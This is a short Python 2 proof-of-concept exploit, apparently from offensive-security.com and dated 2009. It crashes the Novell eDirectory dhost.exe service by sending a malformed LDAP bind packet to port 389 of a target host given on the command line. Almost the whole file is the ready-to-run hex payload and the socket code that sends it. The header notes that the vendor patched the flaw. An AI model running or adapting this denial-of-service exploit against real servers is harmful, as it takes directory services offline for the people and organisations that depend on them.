32 lines
No EOL
1.1 KiB
Python
Executable file
32 lines
No EOL
1.1 KiB
Python
Executable file
#!/usr/bin/python
|
|
# 22/03/2009
|
|
# Novell eDirectory 883ftf3 nldap module DOS
|
|
# Matteo Memelli - offensive-security.com
|
|
# ryujin ___ @ ___ offensive-security.com
|
|
#
|
|
# A malformed bind LDAP packet can make dhost.exe service crashing.
|
|
# 24/03/2009 Vendor notification; patched in 885 release
|
|
#
|
|
|
|
import sys
|
|
from socket import *
|
|
|
|
payload = (
|
|
"\x30\x7E\x02\x02\x01\x60\x77\x02\x84\xFF\xFF\xFF\xFF\x03\x04\x84"
|
|
"\xFF\xFF\xFF\xFF\x64\x63\x3D\x75\x61\x72\x65\x67\x6f\x6e\x6e\x61"
|
|
"\x63\x72\x61\x73\x68\x2C\x64\x63\x3D\x63\x6F\x6D\x2B\x64\x63\x3D"
|
|
"\x75\x61\x72\x65\x67\x6f\x6e\x6e\x61\x63\x72\x61\x73\x68\x2C\x64"
|
|
"\x63\x3D\x63\x6F\x6D\x2B\x64\x63\x3D\x75\x61\x72\x65\x67\x6f\x6e"
|
|
"\x6e\x61\x63\x72\x61\x73\x68\x2C\x64\x63\x3D\x63\x6F\x6D\x2B\x64"
|
|
"\x63\x3D\x75\x61\x72\x65\x67\x6f\x6e\x6e\x61\x63\x72\x61\x73\x68"
|
|
"\x2C\x64\x63\x3D\x63\x6F\x6D\x2B\x64\x63\x3D\x63\x6F\x6D\x80\x00"
|
|
)
|
|
|
|
s = socket(AF_INET, SOCK_STREAM)
|
|
print 'connecting...'
|
|
s.connect((sys.argv[1], 389))
|
|
print 'sending payload...'
|
|
s.send(payload)
|
|
print s.recv(1024)
|
|
s.close()
|
|
print 'Done!' |